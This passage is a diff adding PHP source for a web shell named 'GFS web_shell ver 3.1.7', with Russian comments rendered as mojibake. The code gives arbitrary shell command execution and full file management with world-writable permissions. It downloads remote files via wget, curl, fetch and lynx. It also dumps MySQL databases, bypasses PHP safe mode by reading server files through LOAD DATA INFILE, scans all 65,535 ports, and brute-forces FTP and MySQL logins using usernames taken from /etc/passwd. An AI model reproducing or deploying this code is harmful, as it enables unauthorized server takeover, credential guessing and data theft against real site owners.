+  echo "<font color=red>OFF </font><b>";
+ }
+ echo "cURL: </b>";
+ if($curl_on){
+  echo "<font color=green>ON</font><b><br>";
+ }else
+  echo "<font color=red>OFF</font><b><br>";
+ if ($dis_func!=""){
+  echo "Disabled Functions: </b><font color=red>".$dis_func."</font><br><b>";
+ }
+ $uname=ex('uname -a');
+ echo "OS: </b><font color=blue>";
+ if (empty($uname)){
+  echo (php_uname()."</font><br><b>");
+ }else
+  echo $uname."</font><br><b>";
+ $id = ex('id');
+ echo "SERVER: </b><font color=blue>".$server."</font><br><b>";
+ echo "id: </b><font color=blue>";
+ if (!empty($id)){
+  echo $id."</font><br><b>";
+ }else
+  echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid().
+       "</font><br><b>";
+ echo "<b>RemoteAddress:</b><font color=red>".$HTTP_SERVER_VARS['REMOTE_ADDR']."</font><br>";
+ if(isset($HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'])){
+  echo "<b>RemoteAddressIfProxy:</b><font color=red>".$HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR']."</font>";
+ }
+ echo "<hr size=3 color=black>";
+ echo "</font></font>";
+}
+function read_dir($dir)                 //÷èòàåì ïàïêó
+{
+ $d=opendir($dir);
+ $i=0;
+ while($r=readdir($d)){
+  $res[$i]=$r;
+  $i++;
+ }
+ return $res;
+}
+function permissions($mode,$file) {            //îïðåäåëåíèå ñâîéñòâ
+ $type=filetype($file);
+ $perms=$type[0];
+ $perms.=($mode & 00400) ? "r" : "-";
+ $perms.=($mode & 00200) ? "w" : "-";
+ $perms.=($mode & 00100) ? "x" : "-";
+ $perms.=($mode & 00040) ? "r" : "-";
+ $perms.=($mode & 00020) ? "w" : "-";
+ $perms.=($mode & 00010) ? "x" : "-";
+ $perms.=($mode & 00004) ? "r" : "-";
+ $perms.=($mode & 00002) ? "w" : "-";
+ $perms.=($mode & 00001) ? "x" : "-";
+ $perms.="(".$mode.")";
+ return $perms;
+}
+function open_file($fil, $m, $d)                          //Îòêðûòü ôàéë
+{
+ if (!($fp=fopen($fil,$m))) {
+  $res="Error opening file!\n";
+ }else{
+  ob_start();
+  readfile($fil);
+  $res=ob_get_contents();
+  ob_end_clean();
+  if (!(fclose($fp))){
+   $res="ERROR CLOSE";
+  }
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr><td alling=center><b>&nbsp;&nbsp;&nbsp;".$fil."&nbsp;&nbsp;&nbsp;</b></td></tr>";
+ echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+ echo $res;
+ echo "</textarea></td></tr>";
+ if(is_writable($fil)){
+  echo "<input type=\"hidden\" value='".$fil."' name=\"fname\">";
+  echo "<input type=\"hidden\" value='".$d."' name=\"dname\">";
+  echo "<tr><td alling=center><input style='width:100px;' type=\"submit\" value=\"Save\" name=\"b_save\"></td></tr>";
+ }
+ echo "</form></table>";
+}
+function save_file($res,$fil, $d)                     //Ñîõðàíèòü ôàéë
+{
+ unlink($fil);
+ $fp=fopen($fil,"wb");
+ if(!$fp){
+  $res="Error create file!\n".$fp;
+ }else{
+  if (fwrite($fp,$res)){
+   if (fclose($fp)){
+    $res="File save succesfuly!\n";
+   }else $res="Erorr close!\n";
+  }else $res="Error wright!\n";
+ }
+ umask(0000);
+ chmod($fil,0777);
+ return $res;
+}
+function strmass($mass){
+ $res="";
+ foreach($mass as $k=>$v){
+  $res.=$v."|";
+ }
+ return $res;
+}
+function sortbyname($fnames, $d)
+{
+ $filenames="";
+ $foldernames="";
+ $numnames=count($fnames);
+ for($i=0;$i<=$numnames;$i++){
+  if(is_dir($d."/".$fnames[$i])){
+   $foldernames.=$fnames[$i]."|";
+  }else
+   $filenames.=$fnames[$i]."|";
+ }
+ $mass1=explode("|",$foldernames);
+ $mass2=explode("|",$filenames);
+ sort($mass1);
+ sort($mass2);
+ $mass1=strmass($mass1);
+ $mass2=strmass($mass2);
+ $mass=explode("|",$mass1.$mass2);
+ return $mass;
+}
+function list_dir($d)                     //Íàâèãàöèÿ
+{
+ global $HTTP_REFERER;
+ if(isset($_POST['b_up']) OR isset($_POST['b_open_dir'])){
+  chdir($_POST['fname']);
+  $d=getcwd();
+ }else
+  $d=getcwd();
+ if($_POST['b_new_dir']){
+  mkdir($_POST['new']);
+  chmod($_POST['new'],0777);
+  $d=$_POST['new'];
+ }
+ if($_POST['b_del'] AND is_dir($_POST['fname'])){
+  rmdir($_POST['fname']);
+  chdir($_POST['dname']);
+  $d=getcwd();
+ }
+ if($_POST['b_del'] AND !is_dir($_POST['fname'])){
+  unlink($_POST['fname']);
+  chdir($_POST['dname']);
+  $d=getcwd();
+ }
+ if($_POST['b_change_dir']){
+  chdir($_POST['change_dir']);
+  $d=getcwd();
+ }
+ if($_POST['b_new_file'] OR $_POST['b_open_file']){
+  chdir($_POST['dname']);
+  $d=getcwd();
+ }
+ $dir=read_dir($d);
+ $dir=sortbyname($dir,$d);
+ $count=count($dir);
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b>Navigation</b></td></tr>";
+ if(is_writable($d)){
+  echo "<tr><td alling=\"center\"><input style='width:200px;' type=\"text\" value=\"$d\" name=\"new\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"NewDir\" name=\"b_new_dir\"></td>";
+  echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"NewFile\" name=\"b_new_file\"></td></tr>";
+ }
+ echo "<tr><td alling=\"center\"><input style='width:200px;' type=\"text\" value=\"$d\" name=\"change_dir\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"ChangeDir\" name=\"b_change_dir\"></td></tr>";
+ if(!$safe_mode){
+  echo "<tr><td alling=\"center\"><input style='width:200px;' type=\"text\" value=\"\" name=\"ffile\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"FindeFile\" name=\"b_f_file\"></td></tr>";
+ }
+ echo "</table></form>";
+ echo "<table CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>";
+ echo "<tr bgcolor=#ffff00><td><b>&nbsp;&nbsp;&nbsp;Directory&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Permission&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Size&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Owner/Group&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Action&nbsp;&nbsp;&nbsp;</b></td>";
+ for($i=0; $i<$count; $i++){
+  if($dir[$i]!=""){
+   $full=$d."/".$dir[$i];
+   $perm=permissions(fileperms($full),$dir[$i]);
+   $file=$d."/".$dir[$i];
+   echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+   if(is_dir($file)){
+    echo "<tr bgcolor=#98FA00><td>".$dir[$i]."&nbsp;&nbsp;&nbsp;</td><input type=\"hidden\" value='".$d."' name=\"dname\"><input type=\"hidden\" value='".$file."' name=\"fname\"><td alling=\"center\">".$perm.
+          "&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">".filesize($dir[$i])."&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">&nbsp;&nbsp;&nbsp;".fileowner($dir[$i])."&nbsp;&nbsp;&nbsp;".filegroup($dir[$i])."&nbsp;&nbsp;&nbsp;</td>";
+   }elseif(is_file($file)){
+    echo "<tr><td>".$dir[$i]."&nbsp;&nbsp;&nbsp;</td><input type=\"hidden\" value='".$d."' name=\"dname\"><input type=\"hidden\" value='".$file."' name=\"fname\"><td alling=\"center\">".$perm.
+         "&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">".filesize($dir[$i])."&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">&nbsp;&nbsp;&nbsp;".fileowner($dir[$i])."&nbsp;&nbsp;&nbsp;".filegroup($dir[$i])."&nbsp;&nbsp;&nbsp;</td>";
+   }else
+     echo "<tr bgcolor=#ffff00><td>".$dir[$i]."&nbsp;&nbsp;&nbsp;</td><input type=\"hidden\" value='".$d."' name=\"dname\"><input type=\"hidden\" value='".$file."' name=\"fname\"><td alling=\"center\">".$perm.
+         "&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">".filesize($dir[$i])."&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">&nbsp;&nbsp;&nbsp;".fileowner($dir[$i])."&nbsp;&nbsp;&nbsp;".filegroup($dir[$i])."&nbsp;&nbsp;&nbsp;</td>";
+   if(is_dir($file)){
+    echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Listing\" name=\"b_open_dir\"></td>";
+   }elseif(is_readable($file)){
+    echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Open\" name=\"b_open_file\"></td>";
+   }
+   if(is_writable($file) AND $file!=".."){
+    echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Delete\" name=\"b_del\"></td>";
+   }
+   if(is_readable($file) AND !is_dir($file)){
+    echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Download\" name=\"b_down\"></td>";
+   }
+   echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\"></tr>";
+   echo "</form>";
+  }
+ }
+ echo "</table>";
+ closedir($d);
+}
+function up_file($fil,$tfil, $box)                   //Çàãðóçêà ôàéëîâ íà ñåðâåð
+{
+ global $_FILES;
+ if ($tfil==""){
+  $res="Target is failde!";
+ }
+ if ($box=="PC"){
+  if(copy($_FILES["filename"]["tmp_name"],$tfil)){
+   chmod($tfil,0777);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  }else {
+    $res="Error loading file!";
+  }
+ }
+ if($box=="WGET") {
+  $load="wget ".$fil." -O ".$tfil."";
+  $res=ex($load);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  chmod($tfil,0777);
+ }
+ if($box=="FETCH"){
+  $load="fetch -o ".$tfil." -p ".$fil."";
+  $res=ex($load);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  chmod($tfil,0777);
+ }
+ if($box=="LYNX"){
+  $load="lynx -source ".$fil." > ".$tfil."";
+  $res=ex($load);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  chmod($tfil,0777);
+ }
+ if($box=="cURL"){
+  $load="curl"." ".$fil." -o ".$tfil."";
+  $res=ex($load);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  chmod($tfil,0777);
+ }
+ if($box=="fopen"){
+  $data=implode("", file($fil));
+  $fp=fopen($tfil, "wb");
+  fputs($fp,$data);
+  fclose($fp);
+  chmod($tfil,0777);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+ }
+ return $res;
+}
+function run_sql($comd, $db,$host, $username, $pass)   //Ðåçóëüòàò SQL çàïðîñà
+{
+ if ($comd!=""){
+  if ($db!=""){
+   $connect=mysql_connect($host, $username, $pass);
+   if (!$connect) {
+    $res='Could not connect to MySQL';
+   }
+   mysql_select_db ($db);
+   $row=mysql_query($comd);
+   while ($r= mysql_fetch_row($row)) {
+    $res.="&nbsp;".implode($r);
+   }
+   $result=$res;
+   mysql_free_result($row);
+   mysql_free_result($r);
+   mysql_close($connect);
+  }else $result="Select data base!";
+ }else $result="No command!";
+ return $result;
+}
+function db_show($host, $username, $pass)             //Âûâîä èìåþùèõñÿ ÁÄ
+{
+ $res="Exists BD: \n";
+ $connect=mysql_connect($host, $username, $pass);
+ if (!$connect){
+  $res="Could not connect to MySQL!\n".mysql_error();
+ }else{
+  $db_list=mysql_list_dbs($connect);
+  while ($row = mysql_fetch_object($db_list)) {
+   $res.=$row->Database . "\n";
+  }
+  mysql_close($connect);
+ }
+ return $res;
+}
+function show_tables($bd, $host, $username, $pass)   //Âûâîä èìåþùèõñÿ òàáëèö
+{
+ if ($bd!=""){
+  $res="Exists tables: \n";
+  $connect=mysql_connect($host, $username, $pass);
+  if (!$connect){
+   $res="Could not connect to MySQL\n".mysql_error();
+  }else{
+   $r=mysql_query("SHOW TABLES FROM $bd");
+   $res="Exist tables:\n";
+   while ($row=mysql_fetch_row($r)) {
+    $res.="Table: $row[0]\n";
+    $fields=mysql_list_fields($bd, $row[0], $connect);
+    $columns=mysql_num_fields($fields);
+    $res.="| ";
+    for ($i=0; $i<$columns; $i++) {
+     $res.=mysql_field_name($fields, $i)." | ";
+    }
+    $res.="\n____________________________\n";
+   }
+   mysql_free_result($r);
+   mysql_close($connect);
+  }
+ }else
+  $res="Select data base! ";
+ return $res;
+}
+function dump_table($tab, $db,$host, $username, $pass)  //Äàìï òàáëèöû
+{
+ $connect=mysql_connect($host, $username, $pass);
+ if (!$connect) {
+  $result="Could not connect to MySQL!\n".mysql_error();
+ }else{
+   if (!mysql_select_db($db,$connect)){
+    $result="Could not connect to db!\n".mysql_error();
+   }else{
+    if ($db==""){
+     $result="Select data base!";
+    }else{
+     $res1="# MySQL dump of $tab\r\n";
+     $r=mysql_query("SHOW CREATE TABLE `".$tab."`", $connect);
+     $row=mysql_fetch_row($r);
+     $res1.=$row[1]."\r\n\r\n";
+     $res1.= "# ---------------------------------\r\n\r\n";
+     $res2 = '';
+     $r=mysql_query("SELECT * FROM `".$tab."`", $connect);
+     if (mysql_num_rows($r)>0){
+      while (($row=mysql_fetch_assoc($r))){
+       $keys=implode("`, `", array_keys($row));
+       $values=array_values($row);
+       foreach($values as $k=>$v){
+        $values[$k]=addslashes($v);
+       }
+       $values=implode("', '", $values);
+       $res2.="INSERT INTO `".$tab."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n";
+      }
+      $res2.="\r\n# ---------------------------------";
+     }
+     $result=$res1.$res2;
+     mysql_close($db);
+    }
+   }
+ }
+
+ return $result;
+}
+function down_tb($tab, $db,$host, $username, $pass){
+ $connect=mysql_connect($host, $username, $pass);
+ if (!$connect) {
+  die("Could not connect to MySQL!\n".mysql_error());
+ }else{
+   if (!mysql_select_db($db,$connect)){
+    die("Could not connect to db!\n".mysql_error());
+   }else{
+    if ($db==""){
+     die("Select data base!");
+    }else{
+     $res1="";
+     $r=mysql_query("SELECT * FROM `".$tab."`", $connect);
+     if (mysql_num_rows($r)>0){
+      while (($row=mysql_fetch_assoc($r))){
+       foreach($row as $k=>$v){
+        $res1.=$v."\t";
+       }
+       $res1.="\n";
+      }
+     }
+     mysql_close($db);
+    }
+   }
+ }
+
+ return $res1;
+}
+function safe_mode_fuck($fil,$host, $username, $pass, $dbname)//Îáõîä áåçîïàñíîãî ðåæèìà
+{
+ $connect=mysql_connect($host,$username,$pass);
+ if($connect){
+  if(mysql_select_db($dbname,$connect)){
+   $c="DROP TABLE IF EXISTS temp_gfs_table;";
+   mysql_query($c);
+   $c="CREATE TABLE `temp_gfs_table` ( `file` LONGBLOB NOT NULL );";
+   mysql_query($c);
+   $c="LOAD DATA INFILE \"".$fil."\" INTO TABLE temp_gfs_table;";
+   mysql_query($c);
+   $c="SELECT * FROM temp_gfs_table;";
+   $r=mysql_query($c);
+   while(($row=mysql_fetch_array($r))){
+    $res.=htmlspecialchars($row[0]);
+   }
+   $c="DROP TABLE IF EXISTS temp_gfs_table;";
+   mysql_query($c);
+   }else
+    $res= "Can't select database";
+  mysql_close($db);
+  }else
+   $res="Can't connect to mysql server";
+ return $res;
+}
+function portscan($host)
+{
+ global $port;
+ echo "<table BORDER=1 align=center>";
+ echo "<tr><td alling=center>Host:  </td><td alling=center><b><font color=green> ".$host." </b></font></td></tr>";
+ for($i=1; $i<=65535; $i++){
+  $fp=fsockopen($host, $i, $errno, $errstr, 4);
+  if($fp){
+   fclose($fp);
+   if(isset($port[$i])){
+    $k=$port[$i];
+   }else
+    $k=getservbyport($i, "TCP");
+   if($k==""){$k="N\A";}
+   echo "<tr><td alling=center>Port: ".$i." </td><td alling=center><b><font color=green>".$k."</b></font></td>";
+   echo "</tr>";
+  }
+ }
+ echo "</table>";
+}
+function pwd_conwert()
+{
+ $res="";
+ if(file_exists("/etc/passwd")){
+  $input=implode(file("/etc/passwd"));
+  $input=explode("\n", $input);
+  foreach($input as $i=>$v){
+   $word=explode(":",$v);
+   $res.=$word[0]." ";
+  }
+  $res=explode(" ",$res);
+ }else{
+  $input=implode(ex("cat /etc/passwd"));
+  $input=explode("\n", $input);
+  foreach($input as $i=>$v){
+   $word=explode(":",$v);
+   $res.=$word[0]." ";
+  }
+  $res=explode(" ",$res);
+ }
+ return $res;
+}
+function brute($type,$type2,$host,$file)
+{
+ if($type2=="login:login"){
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=ftp_connect($host);
+     if(!$conn_id){ die("Coud not connect");}
+     if (ftp_login($conn_id, $v, $v)){
+      echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }else
+      echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=red> NO </b></font></td></tr>";
+     ftp_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=mysql_connect($host,$v,$v);
+     if($conn_id){
+      echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }else
+      echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=red> NO </b></font></td></tr>";
+     mysql_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="login:empty"){
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=ftp_connect($host);
+     if(!$conn_id){ die("Coud not connect");}
+     if (ftp_login($conn_id, $v, "")){
+      echo "<tr><td alling=center> ".$v." : empty </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }
+     ftp_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=mysql_connect($host,$v,"");
+     if($conn_id){
+      echo "<tr><td alling=center> ".$v." : empty </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }
+     mysql_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="login:number"){
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=ftp_connect($host);
+     if(!$conn_id){ die("Coud not connect");}
+     for($j=0; $j<=999; $j++){
+      if (ftp_login($conn_id, $v, "$j")){
+       echo "<tr><td alling=center> ".$v." : $j </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+      }
+      ftp_close($conn_id);
+     }
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     for($j=0; $j<=999; $j++){
+      $conn_id=mysql_connect($host,$v,"$j");
+      if($conn_id){
+        echo "<tr><td alling=center> ".$v." : $j </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+       }
+       mysql_close($conn_id);
+     }
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="login:nigol"){
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=ftp_connect($host);
+     if(!$conn_id){ die("Coud not connect");}
+     if (ftp_login($conn_id, $v, strrev($v))){
+      echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }else
+      echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=red> NO </b></font></td></tr>";
+     ftp_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=mysql_connect($host,$v,strrev($v));
+     if($conn_id){
+      echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }else
+      echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=red> NO </b></font></td></tr>";
+     mysql_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="login:lib"){
+  $input=file($file);
+  foreach($input as $i=>$v){
+   $word=explode(":",$v);
+   $res.=$word[0]." ".$word[1]." ";
+  }
+  $lib=explode(" ",$res);
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     foreach($lib as $kk=>$vv){
+      $conn_id=ftp_connect($host);
+      if(!$conn_id){ die("Coud not connect");}
+      if (ftp_login($conn_id, $v, $lib[$kk])){
+       echo "<tr><td alling=center> ".$v." : ".$lib[$kk]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+      }
+      ftp_close($conn_id);
+     }
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     foreach($lib as $kk=>$vv){
+      $conn_id=mysql_connect($host,$v,$lib[$kk]);
+      if($conn_id){
+       echo "<tr><td alling=center> ".$v." : ".$lib[$kk]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+      }
+      mysql_close($conn_id);
+     }
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="lib:lib"){
+  $input=file($file);
+  foreach($input as $i=>$v){
+   $word=explode(":",$v);
+   $res.=$word[0]." ".$word[1]." ";
+  }
+  $lib=explode(" ",$res);
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $count_lib=count($lib);
+   for($kk=0; $kk<$count_lib; $kk=$kk+2){
+    $conn_id=ftp_connect($host);
+    if(!$conn_id){ die("Coud not connect");}
+    if (ftp_login($conn_id,$lib[$kk],$lib[$kk+1])){
+     echo "<tr><td alling=center> ".$lib[$kk]." : ".$lib[$kk+1]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+    }
+    ftp_close($conn_id);
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $count_lib=count($lib);
+   for($kk=0; $kk<$count_lib; $kk=$kk+2){
+    if($lib[$kk]!=""){
+     $conn_id=mysql_connect($host,$lib[$kk],$lib[$kk+1]);
+     if($conn_id){
+      echo "<tr><td alling=center> ".$lib[$kk]." : ".$lib[$kk+1]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }
+     mysql_close($conn_id);
+    }
+   }
+  echo "</table>";
+  }
+ }
+}
+
+////////////////////////////////////////////////////////////////////////////////
+///////////////////////////////// ÊÎÄ //////////////////////////////////////////
+////////////////////////////////////////////////////////////////////////////////
+echo $HTML;
+echo "<font  face=Verdana size=2 color=blue><b>";
+echo (rep_char("&nbsp;",15));
+echo "GFS web_shell ver 3.1.7 </b></font>";
+echo "<hr size=3 color=black>";
+sysinfo();
+echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+echo "<table BORDER=1 align=center>";
+if($r_act=="nav" OR $r_act==NULL){
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"nav\"><b>Navigation</b></td>";
+}else
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><input type=radio name=\"r_act\" value=\"nav\"><b>Navigation</b></td>";
+if(!$safe_mode){
+ if($r_act=="bind"){
+  echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"bind\"><b>BindPort</b></td>";
+ }else
+  echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"bind\"><b>BindPort</b></td>";
+}
+
+if(function_exists(fsockopen)){
+ if($r_act=="port"){
+  echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"port\"><b>PortScan</b></td>";
+ }else
+  echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"port\"><b>PortScan</b></td>";
+}
+if($r_act=="brute"){
+ echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"brute\"><b>Brute</b></td>";
+}else
+ echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"brute\"><b>Brute</b></td>";
+if($r_act=="eval"){
+ echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"eval\"><b>Eval</b></td>";
+}else
+ echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"eval\"><b>Eval</b></td>";
+echo "<td><input type=submit name=\"b_act\" value=\"Change\"></td></tr></table></form>";
+################## ACTION ######################################################
+if($r_act=="nav" OR $r_act==NULL){
+ $box=$_POST['box'];
+ if($_POST['b_save']){
+  $res=save_file($_POST['text'],$_POST['fname'],$_POST['dname']);
+ }elseif($_POST['b_new_file']){
+  open_file($_POST['new'],"wb",$_POST['dname']);
+ }elseif($_POST['b_open_file']){
+  open_file($_POST['fname'],"r",$_POST['dname']);
+ }elseif($_POST['b_mail']){
+  $res="Function under construction!!!!!!!!!";
+ }elseif($_POST['b_run']){
+  chdir($_POST['wdir']);
+  $dir=getcwd();
+  $res=ex($_POST['cmd']);
+ }elseif($_POST['b_f_file']){
+  chdir($_POST['wdir']);
+  $dir=getcwd();
+  $res=ex("whereis ".$_POST['ffile']);
+ }elseif($_POST['b_upload']){
+  $s="Uploading file ".$_POST['lfilename']." use the ".$box;
+  $res=up_file($_POST['lfilename'],$_POST['tfilename'],$_POST['box']);
+ }elseif($_POST['b_mydb']){                              //Âûâîäèì ñïèñîê ÁÄ
+  $s="show_exists_db";
+  $res=db_show($_POST['host'], $_POST['username'], $_POST['pass']);
+ }elseif ($_POST['b_runsql']){                           //Âûïîëíÿåì SQL çàïðîñ
+  $s="SQL: ".$sql;
+  $res=run_sql($_POST['sql'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ }elseif($_POST['b_base']){                              //Âûâîäèì ñïèñîê òàáëèö
+  $s="show_exists_tables";
+  $res=show_tables($_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ }elseif($_POST['b_table']){                             //Âûâîäèì äàìï òàáëèöû
+  $s="Dump of ".$_POST['tablename'];
+  $tablename=$_POST['tablename'];
+  if ($tablename!=""){
+   $res=dump_table($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+  }else
+   $res="Select table!";
+ }elseif($_POST['b_safe_fuck']){                        //Îáõîä áåçîïàñíîãî ðåæèìà
+  $s="Open file ".$sfilename." with MySQL:";
+  $res=safe_mode_fuck($_POST['sfilename'],$_POST['host'], $_POST['username'], $_POST['pass'], $_POST['dbname']);
+ }elseif($_POST['b_dfilename']){                        //Îáõîä áåçîïàñíîãî ðåæèìà
+  $s="Dump in ".$dfilename." from ".$_POST['tablename'].":";
+  $res=run_sql("SELECT * INTO OUTFILE '".addslashes($_POST['dfilename'])."' FROM ".$_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ }
+ if ($host=="") {$host="localhost";}
+ if(isset($res)){
+  echo "<table BORDER=1 align=center>";
+  echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+  echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+  echo $res;
+  echo "</textarea></td></tr></table>";
+ }
+################## EXECUTE #####################################################
